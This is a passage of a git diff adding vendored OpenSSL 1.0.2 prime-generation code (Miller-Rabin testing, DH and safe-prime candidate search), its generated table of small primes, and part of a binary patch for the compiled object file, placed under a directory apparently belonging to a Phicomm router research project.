+    if (check == NULL)
+        goto err;
+
+    /* compute A1 := A - 1 */
+    if (!BN_copy(A1, A))
+        goto err;
+    if (!BN_sub_word(A1, 1))
+        goto err;
+    if (BN_is_zero(A1)) {
+        ret = 0;
+        goto err;
+    }
+
+    /* write  A1  as  A1_odd * 2^k */
+    k = 1;
+    while (!BN_is_bit_set(A1, k))
+        k++;
+    if (!BN_rshift(A1_odd, A1, k))
+        goto err;
+
+    /* Montgomery setup for computations mod A */
+    mont = BN_MONT_CTX_new();
+    if (mont == NULL)
+        goto err;
+    if (!BN_MONT_CTX_set(mont, A, ctx))
+        goto err;
+
+    for (i = 0; i < checks; i++) {
+        if (!BN_pseudo_rand_range(check, A1))
+            goto err;
+        if (!BN_add_word(check, 1))
+            goto err;
+        /* now 1 <= check < A */
+
+        j = witness(check, A, A1, A1_odd, k, ctx, mont);
+        if (j == -1)
+            goto err;
+        if (j) {
+            ret = 0;
+            goto err;
+        }
+        if (!BN_GENCB_call(cb, 1, i))
+            goto err;
+    }
+    ret = 1;
+ err:
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        if (ctx_passed == NULL)
+            BN_CTX_free(ctx);
+    }
+    if (mont != NULL)
+        BN_MONT_CTX_free(mont);
+
+    return (ret);
+}
+
+static int witness(BIGNUM *w, const BIGNUM *a, const BIGNUM *a1,
+                   const BIGNUM *a1_odd, int k, BN_CTX *ctx,
+                   BN_MONT_CTX *mont)
+{
+    if (!BN_mod_exp_mont(w, w, a1_odd, a, ctx, mont)) /* w := w^a1_odd mod a */
+        return -1;
+    if (BN_is_one(w))
+        return 0;               /* probably prime */
+    if (BN_cmp(w, a1) == 0)
+        return 0;               /* w == -1 (mod a), 'a' is probably prime */
+    while (--k) {
+        if (!BN_mod_mul(w, w, w, a, ctx)) /* w := w^2 mod a */
+            return -1;
+        if (BN_is_one(w))
+            return 1;           /* 'a' is composite, otherwise a previous 'w'
+                                 * would have been == -1 (mod 'a') */
+        if (BN_cmp(w, a1) == 0)
+            return 0;           /* w == -1 (mod a), 'a' is probably prime */
+    }
+    /*
+     * If we get here, 'w' is the (a-1)/2-th power of the original 'w', and
+     * it is neither -1 nor +1 -- so 'a' cannot be prime
+     */
+    bn_check_top(w);
+    return 1;
+}
+
+static int probable_prime(BIGNUM *rnd, int bits)
+{
+    int i;
+    prime_t mods[NUMPRIMES];
+    BN_ULONG delta, maxdelta;
+
+ again:
+    if (!BN_rand(rnd, bits, 1, 1))
+        return (0);
+    /* we now have a random number 'rand' to test. */
+    for (i = 1; i < NUMPRIMES; i++)
+        mods[i] = (prime_t) BN_mod_word(rnd, (BN_ULONG)primes[i]);
+    maxdelta = BN_MASK2 - primes[NUMPRIMES - 1];
+    delta = 0;
+ loop:for (i = 1; i < NUMPRIMES; i++) {
+        /*
+         * check that rnd is not a prime and also that gcd(rnd-1,primes) == 1
+         * (except for 2)
+         */
+        if (((mods[i] + delta) % primes[i]) <= 1) {
+            delta += 2;
+            if (delta > maxdelta)
+                goto again;
+            goto loop;
+        }
+    }
+    if (!BN_add_word(rnd, delta))
+        return (0);
+    bn_check_top(rnd);
+    return (1);
+}
+
+static int probable_prime_dh(BIGNUM *rnd, int bits,
+                             const BIGNUM *add, const BIGNUM *rem,
+                             BN_CTX *ctx)
+{
+    int i, ret = 0;
+    BIGNUM *t1;
+
+    BN_CTX_start(ctx);
+    if ((t1 = BN_CTX_get(ctx)) == NULL)
+        goto err;
+
+    if (!BN_rand(rnd, bits, 0, 1))
+        goto err;
+
+    /* we need ((rnd-rem) % add) == 0 */
+
+    if (!BN_mod(t1, rnd, add, ctx))
+        goto err;
+    if (!BN_sub(rnd, rnd, t1))
+        goto err;
+    if (rem == NULL) {
+        if (!BN_add_word(rnd, 1))
+            goto err;
+    } else {
+        if (!BN_add(rnd, rnd, rem))
+            goto err;
+    }
+
+    /* we now have a random number 'rand' to test. */
+
+ loop:for (i = 1; i < NUMPRIMES; i++) {
+        /* check that rnd is a prime */
+        if (BN_mod_word(rnd, (BN_ULONG)primes[i]) <= 1) {
+            if (!BN_add(rnd, rnd, add))
+                goto err;
+            goto loop;
+        }
+    }
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    bn_check_top(rnd);
+    return (ret);
+}
+
+static int probable_prime_dh_safe(BIGNUM *p, int bits, const BIGNUM *padd,
+                                  const BIGNUM *rem, BN_CTX *ctx)
+{
+    int i, ret = 0;
+    BIGNUM *t1, *qadd, *q;
+
+    bits--;
+    BN_CTX_start(ctx);
+    t1 = BN_CTX_get(ctx);
+    q = BN_CTX_get(ctx);
+    qadd = BN_CTX_get(ctx);
+    if (qadd == NULL)
+        goto err;
+
+    if (!BN_rshift1(qadd, padd))
+        goto err;
+
+    if (!BN_rand(q, bits, 0, 1))
+        goto err;
+
+    /* we need ((rnd-rem) % add) == 0 */
+    if (!BN_mod(t1, q, qadd, ctx))
+        goto err;
+    if (!BN_sub(q, q, t1))
+        goto err;
+    if (rem == NULL) {
+        if (!BN_add_word(q, 1))
+            goto err;
+    } else {
+        if (!BN_rshift1(t1, rem))
+            goto err;
+        if (!BN_add(q, q, t1))
+            goto err;
+    }
+
+    /* we now have a random number 'rand' to test. */
+    if (!BN_lshift1(p, q))
+        goto err;
+    if (!BN_add_word(p, 1))
+        goto err;
+
+ loop:for (i = 1; i < NUMPRIMES; i++) {
+        /* check that p and q are prime */
+        /*
+         * check that for p and q gcd(p-1,primes) == 1 (except for 2)
+         */
+        if ((BN_mod_word(p, (BN_ULONG)primes[i]) == 0) ||
+            (BN_mod_word(q, (BN_ULONG)primes[i]) == 0)) {
+            if (!BN_add(p, p, padd))
+                goto err;
+            if (!BN_add(q, q, qadd))
+                goto err;
+            goto loop;
+        }
+    }
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    bn_check_top(p);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.h
new file mode 100644
index 0000000..51d2194
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.h
@@ -0,0 +1,327 @@
+/* Auto generated by bn_prime.pl */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef EIGHT_BIT
+#define NUMPRIMES 2048
+typedef unsigned short prime_t;
+#else
+#define NUMPRIMES 54
+typedef unsigned char prime_t;
+#endif
+static const prime_t primes[NUMPRIMES]=
+	{
+	   2,   3,   5,   7,  11,  13,  17,  19,
+	  23,  29,  31,  37,  41,  43,  47,  53,
+	  59,  61,  67,  71,  73,  79,  83,  89,
+	  97, 101, 103, 107, 109, 113, 127, 131,
+	 137, 139, 149, 151, 157, 163, 167, 173,
+	 179, 181, 191, 193, 197, 199, 211, 223,
+	 227, 229, 233, 239, 241, 251,
+#ifndef EIGHT_BIT
+	 257, 263,
+	 269, 271, 277, 281, 283, 293, 307, 311,
+	 313, 317, 331, 337, 347, 349, 353, 359,
+	 367, 373, 379, 383, 389, 397, 401, 409,
+	 419, 421, 431, 433, 439, 443, 449, 457,
+	 461, 463, 467, 479, 487, 491, 499, 503,
+	 509, 521, 523, 541, 547, 557, 563, 569,
+	 571, 577, 587, 593, 599, 601, 607, 613,
+	 617, 619, 631, 641, 643, 647, 653, 659,
+	 661, 673, 677, 683, 691, 701, 709, 719,
+	 727, 733, 739, 743, 751, 757, 761, 769,
+	 773, 787, 797, 809, 811, 821, 823, 827,
+	 829, 839, 853, 857, 859, 863, 877, 881,
+	 883, 887, 907, 911, 919, 929, 937, 941,
+	 947, 953, 967, 971, 977, 983, 991, 997,
+	1009,1013,1019,1021,1031,1033,1039,1049,
+	1051,1061,1063,1069,1087,1091,1093,1097,
+	1103,1109,1117,1123,1129,1151,1153,1163,
+	1171,1181,1187,1193,1201,1213,1217,1223,
+	1229,1231,1237,1249,1259,1277,1279,1283,
+	1289,1291,1297,1301,1303,1307,1319,1321,
+	1327,1361,1367,1373,1381,1399,1409,1423,
+	1427,1429,1433,1439,1447,1451,1453,1459,
+	1471,1481,1483,1487,1489,1493,1499,1511,
+	1523,1531,1543,1549,1553,1559,1567,1571,
+	1579,1583,1597,1601,1607,1609,1613,1619,
+	1621,1627,1637,1657,1663,1667,1669,1693,
+	1697,1699,1709,1721,1723,1733,1741,1747,
+	1753,1759,1777,1783,1787,1789,1801,1811,
+	1823,1831,1847,1861,1867,1871,1873,1877,
+	1879,1889,1901,1907,1913,1931,1933,1949,
+	1951,1973,1979,1987,1993,1997,1999,2003,
+	2011,2017,2027,2029,2039,2053,2063,2069,
+	2081,2083,2087,2089,2099,2111,2113,2129,
+	2131,2137,2141,2143,2153,2161,2179,2203,
+	2207,2213,2221,2237,2239,2243,2251,2267,
+	2269,2273,2281,2287,2293,2297,2309,2311,
+	2333,2339,2341,2347,2351,2357,2371,2377,
+	2381,2383,2389,2393,2399,2411,2417,2423,
+	2437,2441,2447,2459,2467,2473,2477,2503,
+	2521,2531,2539,2543,2549,2551,2557,2579,
+	2591,2593,2609,2617,2621,2633,2647,2657,
+	2659,2663,2671,2677,2683,2687,2689,2693,
+	2699,2707,2711,2713,2719,2729,2731,2741,
+	2749,2753,2767,2777,2789,2791,2797,2801,
+	2803,2819,2833,2837,2843,2851,2857,2861,
+	2879,2887,2897,2903,2909,2917,2927,2939,
+	2953,2957,2963,2969,2971,2999,3001,3011,
+	3019,3023,3037,3041,3049,3061,3067,3079,
+	3083,3089,3109,3119,3121,3137,3163,3167,
+	3169,3181,3187,3191,3203,3209,3217,3221,
+	3229,3251,3253,3257,3259,3271,3299,3301,
+	3307,3313,3319,3323,3329,3331,3343,3347,
+	3359,3361,3371,3373,3389,3391,3407,3413,
+	3433,3449,3457,3461,3463,3467,3469,3491,
+	3499,3511,3517,3527,3529,3533,3539,3541,
+	3547,3557,3559,3571,3581,3583,3593,3607,
+	3613,3617,3623,3631,3637,3643,3659,3671,
+	3673,3677,3691,3697,3701,3709,3719,3727,
+	3733,3739,3761,3767,3769,3779,3793,3797,
+	3803,3821,3823,3833,3847,3851,3853,3863,
+	3877,3881,3889,3907,3911,3917,3919,3923,
+	3929,3931,3943,3947,3967,3989,4001,4003,
+	4007,4013,4019,4021,4027,4049,4051,4057,
+	4073,4079,4091,4093,4099,4111,4127,4129,
+	4133,4139,4153,4157,4159,4177,4201,4211,
+	4217,4219,4229,4231,4241,4243,4253,4259,
+	4261,4271,4273,4283,4289,4297,4327,4337,
+	4339,4349,4357,4363,4373,4391,4397,4409,
+	4421,4423,4441,4447,4451,4457,4463,4481,
+	4483,4493,4507,4513,4517,4519,4523,4547,
+	4549,4561,4567,4583,4591,4597,4603,4621,
+	4637,4639,4643,4649,4651,4657,4663,4673,
+	4679,4691,4703,4721,4723,4729,4733,4751,
+	4759,4783,4787,4789,4793,4799,4801,4813,
+	4817,4831,4861,4871,4877,4889,4903,4909,
+	4919,4931,4933,4937,4943,4951,4957,4967,
+	4969,4973,4987,4993,4999,5003,5009,5011,
+	5021,5023,5039,5051,5059,5077,5081,5087,
+	5099,5101,5107,5113,5119,5147,5153,5167,
+	5171,5179,5189,5197,5209,5227,5231,5233,
+	5237,5261,5273,5279,5281,5297,5303,5309,
+	5323,5333,5347,5351,5381,5387,5393,5399,
+	5407,5413,5417,5419,5431,5437,5441,5443,
+	5449,5471,5477,5479,5483,5501,5503,5507,
+	5519,5521,5527,5531,5557,5563,5569,5573,
+	5581,5591,5623,5639,5641,5647,5651,5653,
+	5657,5659,5669,5683,5689,5693,5701,5711,
+	5717,5737,5741,5743,5749,5779,5783,5791,
+	5801,5807,5813,5821,5827,5839,5843,5849,
+	5851,5857,5861,5867,5869,5879,5881,5897,
+	5903,5923,5927,5939,5953,5981,5987,6007,
+	6011,6029,6037,6043,6047,6053,6067,6073,
+	6079,6089,6091,6101,6113,6121,6131,6133,
+	6143,6151,6163,6173,6197,6199,6203,6211,
+	6217,6221,6229,6247,6257,6263,6269,6271,
+	6277,6287,6299,6301,6311,6317,6323,6329,
+	6337,6343,6353,6359,6361,6367,6373,6379,
+	6389,6397,6421,6427,6449,6451,6469,6473,
+	6481,6491,6521,6529,6547,6551,6553,6563,
+	6569,6571,6577,6581,6599,6607,6619,6637,
+	6653,6659,6661,6673,6679,6689,6691,6701,
+	6703,6709,6719,6733,6737,6761,6763,6779,
+	6781,6791,6793,6803,6823,6827,6829,6833,
+	6841,6857,6863,6869,6871,6883,6899,6907,
+	6911,6917,6947,6949,6959,6961,6967,6971,
+	6977,6983,6991,6997,7001,7013,7019,7027,
+	7039,7043,7057,7069,7079,7103,7109,7121,
+	7127,7129,7151,7159,7177,7187,7193,7207,
+	7211,7213,7219,7229,7237,7243,7247,7253,
+	7283,7297,7307,7309,7321,7331,7333,7349,
+	7351,7369,7393,7411,7417,7433,7451,7457,
+	7459,7477,7481,7487,7489,7499,7507,7517,
+	7523,7529,7537,7541,7547,7549,7559,7561,
+	7573,7577,7583,7589,7591,7603,7607,7621,
+	7639,7643,7649,7669,7673,7681,7687,7691,
+	7699,7703,7717,7723,7727,7741,7753,7757,
+	7759,7789,7793,7817,7823,7829,7841,7853,
+	7867,7873,7877,7879,7883,7901,7907,7919,
+	7927,7933,7937,7949,7951,7963,7993,8009,
+	8011,8017,8039,8053,8059,8069,8081,8087,
+	8089,8093,8101,8111,8117,8123,8147,8161,
+	8167,8171,8179,8191,8209,8219,8221,8231,
+	8233,8237,8243,8263,8269,8273,8287,8291,
+	8293,8297,8311,8317,8329,8353,8363,8369,
+	8377,8387,8389,8419,8423,8429,8431,8443,
+	8447,8461,8467,8501,8513,8521,8527,8537,
+	8539,8543,8563,8573,8581,8597,8599,8609,
+	8623,8627,8629,8641,8647,8663,8669,8677,
+	8681,8689,8693,8699,8707,8713,8719,8731,
+	8737,8741,8747,8753,8761,8779,8783,8803,
+	8807,8819,8821,8831,8837,8839,8849,8861,
+	8863,8867,8887,8893,8923,8929,8933,8941,
+	8951,8963,8969,8971,8999,9001,9007,9011,
+	9013,9029,9041,9043,9049,9059,9067,9091,
+	9103,9109,9127,9133,9137,9151,9157,9161,
+	9173,9181,9187,9199,9203,9209,9221,9227,
+	9239,9241,9257,9277,9281,9283,9293,9311,
+	9319,9323,9337,9341,9343,9349,9371,9377,
+	9391,9397,9403,9413,9419,9421,9431,9433,
+	9437,9439,9461,9463,9467,9473,9479,9491,
+	9497,9511,9521,9533,9539,9547,9551,9587,
+	9601,9613,9619,9623,9629,9631,9643,9649,
+	9661,9677,9679,9689,9697,9719,9721,9733,
+	9739,9743,9749,9767,9769,9781,9787,9791,
+	9803,9811,9817,9829,9833,9839,9851,9857,
+	9859,9871,9883,9887,9901,9907,9923,9929,
+	9931,9941,9949,9967,9973,10007,10009,10037,
+	10039,10061,10067,10069,10079,10091,10093,10099,
+	10103,10111,10133,10139,10141,10151,10159,10163,
+	10169,10177,10181,10193,10211,10223,10243,10247,
+	10253,10259,10267,10271,10273,10289,10301,10303,
+	10313,10321,10331,10333,10337,10343,10357,10369,
+	10391,10399,10427,10429,10433,10453,10457,10459,
+	10463,10477,10487,10499,10501,10513,10529,10531,
+	10559,10567,10589,10597,10601,10607,10613,10627,
+	10631,10639,10651,10657,10663,10667,10687,10691,
+	10709,10711,10723,10729,10733,10739,10753,10771,
+	10781,10789,10799,10831,10837,10847,10853,10859,
+	10861,10867,10883,10889,10891,10903,10909,10937,
+	10939,10949,10957,10973,10979,10987,10993,11003,
+	11027,11047,11057,11059,11069,11071,11083,11087,
+	11093,11113,11117,11119,11131,11149,11159,11161,
+	11171,11173,11177,11197,11213,11239,11243,11251,
+	11257,11261,11273,11279,11287,11299,11311,11317,
+	11321,11329,11351,11353,11369,11383,11393,11399,
+	11411,11423,11437,11443,11447,11467,11471,11483,
+	11489,11491,11497,11503,11519,11527,11549,11551,
+	11579,11587,11593,11597,11617,11621,11633,11657,
+	11677,11681,11689,11699,11701,11717,11719,11731,
+	11743,11777,11779,11783,11789,11801,11807,11813,
+	11821,11827,11831,11833,11839,11863,11867,11887,
+	11897,11903,11909,11923,11927,11933,11939,11941,
+	11953,11959,11969,11971,11981,11987,12007,12011,
+	12037,12041,12043,12049,12071,12073,12097,12101,
+	12107,12109,12113,12119,12143,12149,12157,12161,
+	12163,12197,12203,12211,12227,12239,12241,12251,
+	12253,12263,12269,12277,12281,12289,12301,12323,
+	12329,12343,12347,12373,12377,12379,12391,12401,
+	12409,12413,12421,12433,12437,12451,12457,12473,
+	12479,12487,12491,12497,12503,12511,12517,12527,
+	12539,12541,12547,12553,12569,12577,12583,12589,
+	12601,12611,12613,12619,12637,12641,12647,12653,
+	12659,12671,12689,12697,12703,12713,12721,12739,
+	12743,12757,12763,12781,12791,12799,12809,12821,
+	12823,12829,12841,12853,12889,12893,12899,12907,
+	12911,12917,12919,12923,12941,12953,12959,12967,
+	12973,12979,12983,13001,13003,13007,13009,13033,
+	13037,13043,13049,13063,13093,13099,13103,13109,
+	13121,13127,13147,13151,13159,13163,13171,13177,
+	13183,13187,13217,13219,13229,13241,13249,13259,
+	13267,13291,13297,13309,13313,13327,13331,13337,
+	13339,13367,13381,13397,13399,13411,13417,13421,
+	13441,13451,13457,13463,13469,13477,13487,13499,
+	13513,13523,13537,13553,13567,13577,13591,13597,
+	13613,13619,13627,13633,13649,13669,13679,13681,
+	13687,13691,13693,13697,13709,13711,13721,13723,
+	13729,13751,13757,13759,13763,13781,13789,13799,
+	13807,13829,13831,13841,13859,13873,13877,13879,
+	13883,13901,13903,13907,13913,13921,13931,13933,
+	13963,13967,13997,13999,14009,14011,14029,14033,
+	14051,14057,14071,14081,14083,14087,14107,14143,
+	14149,14153,14159,14173,14177,14197,14207,14221,
+	14243,14249,14251,14281,14293,14303,14321,14323,
+	14327,14341,14347,14369,14387,14389,14401,14407,
+	14411,14419,14423,14431,14437,14447,14449,14461,
+	14479,14489,14503,14519,14533,14537,14543,14549,
+	14551,14557,14561,14563,14591,14593,14621,14627,
+	14629,14633,14639,14653,14657,14669,14683,14699,
+	14713,14717,14723,14731,14737,14741,14747,14753,
+	14759,14767,14771,14779,14783,14797,14813,14821,
+	14827,14831,14843,14851,14867,14869,14879,14887,
+	14891,14897,14923,14929,14939,14947,14951,14957,
+	14969,14983,15013,15017,15031,15053,15061,15073,
+	15077,15083,15091,15101,15107,15121,15131,15137,
+	15139,15149,15161,15173,15187,15193,15199,15217,
+	15227,15233,15241,15259,15263,15269,15271,15277,
+	15287,15289,15299,15307,15313,15319,15329,15331,
+	15349,15359,15361,15373,15377,15383,15391,15401,
+	15413,15427,15439,15443,15451,15461,15467,15473,
+	15493,15497,15511,15527,15541,15551,15559,15569,
+	15581,15583,15601,15607,15619,15629,15641,15643,
+	15647,15649,15661,15667,15671,15679,15683,15727,
+	15731,15733,15737,15739,15749,15761,15767,15773,
+	15787,15791,15797,15803,15809,15817,15823,15859,
+	15877,15881,15887,15889,15901,15907,15913,15919,
+	15923,15937,15959,15971,15973,15991,16001,16007,
+	16033,16057,16061,16063,16067,16069,16073,16087,
+	16091,16097,16103,16111,16127,16139,16141,16183,
+	16187,16189,16193,16217,16223,16229,16231,16249,
+	16253,16267,16273,16301,16319,16333,16339,16349,
+	16361,16363,16369,16381,16411,16417,16421,16427,
+	16433,16447,16451,16453,16477,16481,16487,16493,
+	16519,16529,16547,16553,16561,16567,16573,16603,
+	16607,16619,16631,16633,16649,16651,16657,16661,
+	16673,16691,16693,16699,16703,16729,16741,16747,
+	16759,16763,16787,16811,16823,16829,16831,16843,
+	16871,16879,16883,16889,16901,16903,16921,16927,
+	16931,16937,16943,16963,16979,16981,16987,16993,
+	17011,17021,17027,17029,17033,17041,17047,17053,
+	17077,17093,17099,17107,17117,17123,17137,17159,
+	17167,17183,17189,17191,17203,17207,17209,17231,
+	17239,17257,17291,17293,17299,17317,17321,17327,
+	17333,17341,17351,17359,17377,17383,17387,17389,
+	17393,17401,17417,17419,17431,17443,17449,17467,
+	17471,17477,17483,17489,17491,17497,17509,17519,
+	17539,17551,17569,17573,17579,17581,17597,17599,
+	17609,17623,17627,17657,17659,17669,17681,17683,
+	17707,17713,17729,17737,17747,17749,17761,17783,
+	17789,17791,17807,17827,17837,17839,17851,17863,
+#endif
+	};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.o
new file mode 100644
index 0000000000000000000000000000000000000000..c7e61786235b61b3c5bb833ad11af82a60fb9e5d
GIT binary patch
literal 11744
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
